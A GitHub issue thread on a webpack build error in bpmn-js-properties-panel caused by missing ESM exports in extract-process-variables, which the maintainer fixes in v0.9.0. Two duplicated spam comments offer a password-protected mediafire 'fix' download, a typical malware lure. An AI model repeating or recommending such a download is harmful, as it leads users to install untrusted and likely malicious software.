### ISSUE TITLE
Build failing while importing bpmn-js-properties-panel (v5.22.0)

### ISSUE THREAD

**Issue by sushmagow** [bpmn-io/extract-process-variables#27]
### Describe the Bug
// getting below error during build time

```
ERROR in ../../../min-dash/dist/index.cjs 1:0
Module parse failed: 'import' and 'export' may appear only with 'sourceType: module' (1:0)
File was processed with these loaders:
 * ../../../file-loader/dist/cjs.js
You may need an additional loader to handle the result of these loaders.
> export default __webpack_public_path__ + "9b5675d661abcf53019b22660bf7b9bf.cjs";
 @ ../../../@bpmn-io/extract-process-variables/dist/index.js 15:14-33
 @ ../../../bpmn-js-properties-panel/dist/index.esm.js 130:0-74 16095:17-37
```

### Steps to Reproduce

```
// import additional modules for BPMN modeller

import { 
    BpmnPropertiesProviderModule, 
    BpmnPropertiesPanelModule, 
    CamundaPlatformPropertiesProviderModule
} from 'bpmn-js-properties-panel';
import CamundaBpmnModdle from 'camunda-bpmn-moddle/resources/camunda.json';

const modeler = new BpmnModeler({
            container: '#container',
            propertiesPanel: {
                parent: '#properties'
            },
            additionalModules: [
                BpmnPropertiesProviderModule, 
                BpmnPropertiesPanelModule, 
                CamundaPlatformPropertiesProviderModule
            ]
            moddleExtensions: {
                camunda: CamundaBpmnModdle
            }
        });
```

// use webpack for build

### Expected Behavior

//update the exports in package json for extract-process-variables
// this will fix the issue

```
"exports": {
     ".": {
      "import": "./dist/index.esm.js",
      "require": "./dist/index.js"
     },
    "./zeebe": {
      "import": "./zeebe/index.esm.js",
      "require": "./zeebe/index.js"
    }
  },
```

### Environment
node verison 18
webpack 5
all bpmn libraries latest

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nikku** [comment]
Do you import the library form a CommonJS or ESM code-base?

**Comment by sushmagow** [comment]
Using esm.
Not directly import extract-process-variables, bpmn-js-properties-panel is
importing.
I have a work around for this in webpack for this.
But updating package exports will be a good fix to support esm also

**Comment by nikku** [comment]
> I have a work around for this in webpack for this.

What is the workaround you mention?

**Comment by nikku** [comment]
So as I understood, from your comments, you're consuming this library from an ES module. 

https://github.com/bpmn-io/extract-process-variables/pull/28, based off your suggestion, properly fixes this. It is a bug that we don't expose the ESM bundle.

**Comment by sushmagow** [comment]
Using resolve alias in webpack.

**Comment by nikku** [comment]
https://github.com/bpmn-io/extract-process-variables/releases/tag/v0.9.0 Should work for you.
